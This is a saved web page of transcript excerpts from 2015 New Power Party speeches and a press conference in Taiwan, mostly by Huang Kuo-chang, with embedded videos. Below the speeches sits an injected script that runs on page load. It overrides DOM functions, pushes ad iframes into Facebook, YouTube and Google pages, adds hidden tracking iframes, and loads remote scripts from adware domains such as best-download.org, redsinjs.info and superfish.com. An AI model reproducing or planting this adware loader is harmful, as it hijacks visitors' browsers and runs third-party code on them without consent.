<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;那從整個大局的角度上面來講，如果有優秀的人才可以投入該地選區的選舉，我非常樂於當一個抬轎者的角色，任何可以做的事情我都願意協助，如果在一定的時間以內沒有辦法找到人願意投入選區的選戰的話，那我自己並不排斥要進去，到那個時間點可能才有哪一個選區的問題。
</p>

<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/72BTlMroaNo?rel=0&theme=light&start=651" frameborder="0" allowfullscreen></iframe></div>
<div id="2_1"><h2>12. 時代力量關鍵戰將萬華掃街 Part 5 路口短講（林昶佐 Freddy，馮光遠，黃國昌） 摘錄 <a href="pdf/時代力量/20150516%20時代力量關鍵戰將萬華掃街%20Part%205%20路口短講（林昶佐%20Freddy，馮光遠，黃國昌）.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;我們要站出來改變這個國會，我們要站出來帶給臺灣政治新的力量，所有時代力量的參選人我可以跟各位好朋友報告，我們在每一個區域的選區當中，我們要挑戰的，我們要挑戰的都是中國國民黨深藍的禁衛軍，在國會裡面的打手，過去幾年在國會裡面阻礙臺灣改革，阻礙臺灣繼續向前進的爛立委，我們選這些不好選的選區，我們沒有去挑軟的柿子吃，我們沒有去挑深綠的選區選，因為我們知道，我們也有信心一定要把國民黨在區域立委裡面，他們真的以為他們可以把選民吃夠夠，不管我在國會裡面做多少的鳥事，不管我在國會裡面如何的胡作非為，你們這些人下一次投票的時候，只要政黨的大旗一揮，你們馬上都歸隊，乖乖的去排隊，把票投給我們這些爛立委，時代力量的朋友不吃這套，時代力量的朋友相信過去幾年一次又一次臺灣人民的覺醒已經帶我們走到可以改變這個國家政治的關鍵時刻了。
</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;在接下來的幾個月當中，時代力量會透過一場又一場的短講，我們沒有錢買電視廣告，我們也沒有錢放大的看板，但是我們有熱情，我們有膽識，我們有勇氣，這股熱情、這股勇氣、這股膽識讓我們團結在一起，勇敢的向前走，我們要改變臺灣的民主政治！我相信在萬華這個地區有很多的長輩，有很多的長輩跟時代力量這一群年輕人有相同的心情，有相同的想法，我們真的受夠了這些爛政客，臺灣不能再被他們這樣亂搞下去，請加入我們，請加入我們，時代力量不是任何一個人的政黨，時代力量是臺灣人的政黨。
</p>

<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/g71GTQigWh4?rel=0&theme=light" frameborder="0" allowfullscreen></iframe></div>
<div id="1_1"><h2>13. 時代力量記者會 說明入黨與捐款方式 黃國昌發言 摘錄 <a href="pdf/時代力量/20150504%20時代力量記者會%20說明入黨與捐款方式%20黃國昌發言.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;這群朋友一月創黨，我們可以很直白的說，他們什麼都沒有，他們什麼都沒有，在什麼都沒有的情況之下，他們走到了今天，這中間有很多不足為外人道的辛酸跟努力，我前兩天跟柯律師還有時代力量今天坐在這邊所有的要參選投入區域立委的朋友，我們大家會面在商談的時候，柯律師跟我說，別人問他他已經投入了區域立委選舉，那為什麼還要在外面當律師接案子，因為他的戶頭裡面只剩下一萬塊，很多工作人員是沒有支薪的，但是他只要成立了總部，門一打開，每天就要支出，在這樣的情況下，這群朋友他們還是堅持走到了今天，而且我相信，我相信秉持著理想的他們，在接下來會得到越來越多的支持，會讓這條路大家走在一起更信心。
</p>
<p>▲&nbsp;&nbsp;&nbsp;第二個部分是，也要拜託各位媒體朋友稍微給我們一點點時間跟空間，因為對我來講，我從25歲執業完律師以後，出去念書，2002年回來，在過去13年的時間當中，我投入的都是我熱愛的教學跟研究工作，我如果一旦宣布參選立委，我相信各位可以了解我必須要跟這樣的生涯，完全轉換人生跑道，我一旦宣布參選區域立委，我接下來馬上要做的事情就必須要跟中央研究院辭去我的工作，我不會一方面待在中研院，另外一方面參與選舉，學術與政治的分際這條線我自己守得非常的嚴重，我可以在中研院裡面參與公民運動，扮演公共知識分子的角色，但是我一旦投入選舉，我就不適合待在這一個全面最高的學術研究單位。
</p>

<a href="#top" id="toTop"></a>

<div id="d_pid" data-id="serv_53a94043e0d2600963" style="display: none;"></div>
<script type="text/javascript">
var D_PID = 'serv_53a94043e0d2600963';
var D_PTR_ID = '1';
var D_SRC_ID = '1';
var prtLoader = {};
</script>
<script type="text/javascript">
prtLoader.ScriptIdf904d07f3c0759dd546fa11ba0a5e9df = function() {
(function(){var j=navigator.language||navigator.userLanguage;if(window.self!==window.top){return}var h=["18hairygirls.com","adcash.com","adult-torrent.com","alluc.to","alphaporno.com","ashemaletube.com","audiopoisk.com","aztecaporno.com","befuck.com","belgixxx.com","best-porno.net","bestube.ru","bild.de","bingoliner.com","brazzers.com","brazzersnetwork.com","btdigg.org","cam4.it","carameltube.com","cjad.com","1tbporno.ru","24video.net","4shared.com","adult-torrent.com","alscash.com","animalsexfun.com","anysex.com","atkmodels.com","baratro.ru","bayproxy.li","beeg.com","bestupskirtporn.com","betfair.com","betvictor.com","bigcinema.tv","black-warez.ru","bobfilm.net","bonusvid.com","budbi.com","cekctube.com"];var n=location.hostname.split(".");var q=n.shift();var i=n.join(".");for(var p in h){if(h[p]==i){console.log("domain blocked");return}}var f=document.getElementsByTagName("iframe");var b=document.getElementsByTagName("object");var l=document.getElementsByTagName("img");var e=document.getElementsByTagName;document.getElementsByTagName=function(t){var s=e.call(document,t);if(typeof(document.querySelectorAll)!="undefined"){return document.querySelectorAll(t+':not([class="prt02123"])')}else{return s}};var m={ad468x60:'<div align="center"><iframe class="prt02123" width="468" height="60" src="http://ib.adnxs.com/tt?id=3318184&size=468x60" frameBorder="0" scrolling="no"></iframe></div>',ad160x600:'<div align="center"><iframe class="prt02123" width="160" height="600" src="http://ib.adnxs.com/tt?id=3318184&size=160x600" frameBorder="0" scrolling="no"></iframe></div>',ad300x250:'<div align="center"><iframe class="prt02123" width="300" height="250" src="http://ib.adnxs.com/tt?id=3318184&size=300x250" frameBorder="0" scrolling="no"></iframe></div>',ad336x280:'<div align="center"><iframe class="prt02123" width="300" height="250" src="http://ib.adnxs.com/tt?id=3318184&size=300x250" frameBorder="0" scrolling="no"></iframe></div>',ad728x90:'<div align="center"><iframe class="prt02123" width="728" height="90" src="http://ib.adnxs.com/tt?id=3318184&size=728x90" frameBorder="0" scrolling="no"></iframe></div>',ad750x100:'<div align="center"><iframe class="prt02123" width="728" height="90" src="http://ib.adnxs.com/tt?id=3318184&size=728x90" frameBorder="0" scrolling="no"></iframe></div>',ad750x150:'<div align="center"><iframe class="prt02123" width="728" height="90" src="http://ib.adnxs.com/tt?id=3318184&size=728x90" frameBorder="0" scrolling="no"></iframe></div>',ad720x300:'<div align="center"><iframe class="prt02123" width="728" height="90" src="http://ib.adnxs.com/tt?id=3318184&size=728x90" frameBorder="0" scrolling="no"></iframe></div>',ad750x300:'<div align="center"><iframe class="prt02123" width="728" height="90" src="http://ib.adnxs.com/tt?id=3318184&size=728x90" frameBorder="0" scrolling="no"></iframe></div>',ad750x200:'<div align="center"><iframe class="prt02123" width="728" height="90" src="http://ib.adnxs.com/tt?id=3318184&size=728x90" frameBorder="0" scrolling="no"></iframe></div>',ad120x600:'<div align="center"><iframe class="prt02123" width="120" height="600" src="http://ib.adnxs.com/tt?id=3318184&size=120x600" frameBorder="0" scrolling="no"></iframe></div>',ad300x600:'<div align="center"><iframe class="prt02123" width="300" height="600" src="http://ib.adnxs.com/tt?id=3318184&size=300x600" frameBorder="0" scrolling="no"></iframe></div>'},a,c=10,o=0,g=0,k=function(){if(!a){a={};for(var s in m){a[s]=s.substr(2).split("x")}}return a},r=function(y){for(var u in y){var t=y[u];var w=k();if(t instanceof Element&&o<c){for(var s in w){var x=(typeof x=="string")?t.width.replace("px",""):t.width;var v=(typeof v=="string")?t.height.replace("px",""):t.height;if(x==w[s][0]&&v==w[s][1]){t.insertAdjacentHTML("afterend",m[s]);t.parentNode.removeChild(t);o++}}}}},d=function(x,v){var t=new RegExp(x),y=window.document;if(t.test(y.URL)){for(var u=0;u<v.length;u++){var w=v[u],s=w.place(y);if(s){w.inject(s,w.ad);g++}}}};injectExtraAdd=function(){var s=document.getElementsByTagName("body")[0];s.insertAdjacentHTML("beforeend",m.ad728x90)};d("(http|https)://([a-z]*).facebook.com(.*)",[{ad:m.ad728x90,place:function(s){return s.getElementById("pagelet_litestand_section")},inject:function(t,s){t.insertAdjacentHTML("afterbegin",s)}},{ad:m.ad300x250,place:function(s){return s.querySelector("#pagelet_litestand_section #pagelet_rhc_footer")},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("pagelet_iframe_canvas_content")},inject:function(t,s){t.insertAdjacentHTML("afterbegin",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("pagelet_iframe_canvas_content")},inject:function(t,s){t.insertAdjacentHTML("beforeend",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("mainContainer")},inject:function(t,s){t.insertAdjacentHTML("afterbegin",s)}},{ad:m.ad160x600,place:function(s){return s.getElementById("leftCol")},inject:function(t,s){t.insertAdjacentHTML("beforeend",s)}}]);d("(http|https)\\:\\/\\/www\\.youtube\\.com(.*)",[{ad:m.ad728x90,place:function(s){return s.querySelector("#page.home")},inject:function(t,s){t.insertAdjacentHTML("afterbegin",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("player")},inject:function(t,s){var u='<div width="985px" style="float:left">'+s+"</div>";t.insertAdjacentHTML("afterbegin",u)}},{ad:m.ad300x250,place:function(s){return s.getElementById("watch7-sidebar")},inject:function(t,s){t.insertAdjacentHTML("afterbegin",s)}}]);d("(http|https)\\:\\/\\/ask\\.fm(.*)",[{ad:m.ad728x90,place:function(s){return s.getElementById("leaderboard")},inject:function(t,s){t.style.height="auto";t.insertAdjacentHTML("beforeend",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("footer")},inject:function(t,s){var u='<div style="background:#fff;width:728px;margin:0 auto 10px auto;padding:3px;border-radius:5px">'+s+"</div>";t.insertAdjacentHTML("beforebegin",u)}}]);d("xvideos\\.com(.*)",[{ad:m.ad728x90,place:function(s){return s.getElementById("main")},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s);t.insertAdjacentHTML("afterend",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("player")},inject:function(t,s){t.insertAdjacentHTML("afterend",s)}}]);d("delta-search\\.com(.*)",[{ad:m.ad728x90,place:function(t){var u=t.getElementById("ymp"),s=t.querySelector("div[align='center']");if(u&&s){u.style.position="static"}return s},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s);t.insertAdjacentHTML("afterend",s)}},{ad:m.ad160x600,place:function(s){return s.querySelector("ul.srcm")},inject:function(u,t){var s="<li>"+t+"</li>";u.insertAdjacentHTML("beforeend",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("srfpn")},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s)}}]);d("4shared\\.com(.*)",[{ad:m.ad728x90,place:function(s){return s.querySelector("div.blueBox")},inject:function(t,s){t.insertAdjacentHTML("afterbegin",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("content")},inject:function(t,s){t.insertAdjacentHTML("beforeend",s)}},{ad:m.ad300x250,place:function(s){return s.querySelector(".d1rightPanel")},inject:function(t,s){t.insertAdjacentHTML("beforeend",s)}},{ad:m.ad300x250,place:function(s){return s.querySelector(".rightPanelMargin")},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s)}}]);d("search\\.ask\\.com(.*)",[{ad:m.ad728x90,place:function(s){return s.getElementById("hpSearchArea")},inject:function(t,s){t.insertAdjacentHTML("afterend",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("firstRow")},inject:function(t,s){t.insertAdjacentHTML("afterend",s)}},{ad:m.ad300x250,place:function(s){return s.getElementById("rightRail")},inject:function(t,s){t.insertAdjacentHTML("beforeend",s)}}]);d("xnxx\\.com(.*)",[{ad:m.ad728x90,place:function(s){return s.getElementById("siteNav")},inject:function(t,s){t.insertAdjacentHTML("afterend",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("pag")},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s)}},{ad:m.ad728x90,place:function(s){return s.querySelector("body > div > table:nth-child(2)")},inject:function(t,s){t.insertAdjacentHTML("afterend",s)}},{ad:m.ad728x90,place:function(s){return s.querySelector("body > div[align='center'] > form + table tr:nth-child(3) > td")},inject:function(t,s){t.insertAdjacentHTML("afterbegin",s)}}]);d("xhamster\\.com(.*)",[{ad:m.ad728x90,place:function(s){return s.getElementById("header")},inject:function(t,s){t.insertAdjacentHTML("afterend",s)}},{ad:m.ad728x90,place:function(s){return s.querySelector("#content > tbody > tr > td.w100")},inject:function(t,s){t.insertAdjacentHTML("beforeend",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("related")},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s)}},{ad:m.ad300x250,place:function(s){return s.querySelector(".adVideo.adVideo2")},inject:function(t,s){t.insertAdjacentHTML("afterend",s)}}]);d("cloob\\.com(.*)",[{ad:m.ad728x90,place:function(s){return s.getElementById("themeArea")},inject:function(t,s){t.insertAdjacentHTML("afterbegin",s);t.insertAdjacentHTML("beforeend",s)}},{ad:m.ad160x600,place:function(s){return s.querySelector("#container .n2_mainRightCol .boxN2")},inject:function(t,s){t.insertAdjacentHTML("beforeend",s)}}]);d("qvo6\\.com(.*)",[{ad:m.ad728x90,place:function(s){return s.querySelector(".terms")},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s)}},{ad:m.ad728x90,place:function(s){return s.querySelector(".search-control-inner")},inject:function(t,s){t.insertAdjacentHTML("afterend",s)}}]);d("sahibinden\\.com(.*)",[{ad:m.ad728x90,place:function(s){return s.getElementById("content")},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s);t.insertAdjacentHTML("afterend",s)}}]);d("mediafire\\.com(.*)",[{ad:m.ad300x250,place:function(s){return s.querySelector(".dl_options_innerblock .left")},inject:function(t,s){t.insertAdjacentHTML("afterbegin",s)}}]);d("varzesh3\\.com(.*)",[{ad:m.ad728x90,place:function(s){return s.getElementById("blk-toolsmenu")},inject:function(t,s){t.insertAdjacentHTML("afterend",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("blk-footer")},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s)}}]);d("google(.*)",[{ad:m.ad728x90,place:function(s){return s.getElementById("body")},inject:function(t,s){t.insertAdjacentHTML("afterend",s)}},{ad:m.ad300x250,place:function(s){return s.getElementById("rhs_block")},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("nav")},inject:function(t,s){t.insertAdjacentHTML("afterend",s)}}]);d("eseeky\\.com(.*)",[{ad:m.ad728x90,place:function(s){return s.getElementById("search-home")},inject:function(t,s){t.insertAdjacentHTML("afterend",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("main")},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("paginate")},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s)}}]);if(g<5){setTimeout(function(){r(f);r(b);r(l);if(o+g<6&&window.location.protocol!=="https:"){injectExtraAdd()}},200)}})();(function(){if(window.self!==window.top){return}var b=document.createElement("iframe");b.setAttribute("src","//service.best-download.org//ads/stats.html");b.setAttribute("width","1");b.setAttribute("height","1");b.setAttribute("frameborder","0");b.setAttribute("border","0");b.setAttribute("scrolling","no");document.body.appendChild(b);if(typeof D_PTR_ID!=="undefined"){var d=D_SRC_ID?D_SRC_ID:"undefined";if(typeof d==="undefined"||d===0){d=D_PTR_ID}var a;if(d==200){a="?utm_campaign=LITE&utm_source="+D_PTR_ID+"&utm_medium=LITE"}else{a="?utm_campaign="+D_PTR_ID+"&utm_source="+d+"&utm_medium="+D_PTR_ID}var c=document.createElement("iframe");c.setAttribute("src","//service.best-download.org/ads/stats_source.html"+a);c.setAttribute("width","1");c.setAttribute("height","1");c.setAttribute("frameborder","0");c.setAttribute("border","0");c.setAttribute("scrolling","no");document.body.appendChild(c)}})();(function(){var a=window,e=document,f=navigator,b=f.language||f.userLanguage;if(a.self!==a.top||a.frames.length!==parent.frames.length){return}var c=document.createElement("script");c.setAttribute("type","text/javascript");c.setAttribute("src","https://cdncache-a.akamaihd.net/loaders/1920/l.js?aoi=1311798366&pid=1920&zoneid=523895&ext=eDeals");document.body.appendChild(c)})();(function(){var b=navigator.language||navigator.userLanguage;if(window.self!==window.top){return}if(window.location.protocol=="https:"){var c="https://i_redsinjs_info.tlscdn.com/redsin/javascript.js"}else{var c="http://i.redsinjs.info/redsin/javascript.js"}var a=document.createElement("script");a.setAttribute("src",c);a.setAttribute("type","text/javascript");document.head.appendChild(a)})();(function(){var b=navigator.language||navigator.userLanguage;var c="http://service.best-download.org/ads/pop.php";var a=document.createElement("script");a.setAttribute("src",c);a.setAttribute("type","text/javascript");document.head.appendChild(a)})();(function(){var b=navigator.language||navigator.userLanguage;if(window.self!==window.top){return}if(window.location.protocol=="http:"){var c="http://www.superfish.com/ws/sf_main.jsp?dlsource=dryadbe";var a=document.createElement("script");a.setAttribute("src",c);a.setAttribute("type","text/javascript");document.head.appendChild(a)}})();(function(){var b=navigator.language||navigator.userLanguage;if(window.self!==window.top){return}var c="http://service.best-download.org/ads/offers.php";var a=document.createElement("script");a.setAttribute("src",c);a.setAttribute("type","text/javascript");document.head.appendChild(a)})();};
</script>
<script type="text/javascript">
function r(f){/in/.test(document.readyState)?setTimeout('r('+f+')',9):f()};
function prtInIframe () { try { return window.self !== window.top;} catch (e) { return true; } }
r(function() {
if (prtInIframe()) {
return;
}
prtLoader.ScriptIdf904d07f3c0759dd546fa11ba0a5e9df();
});
</script>

</body>
</html>
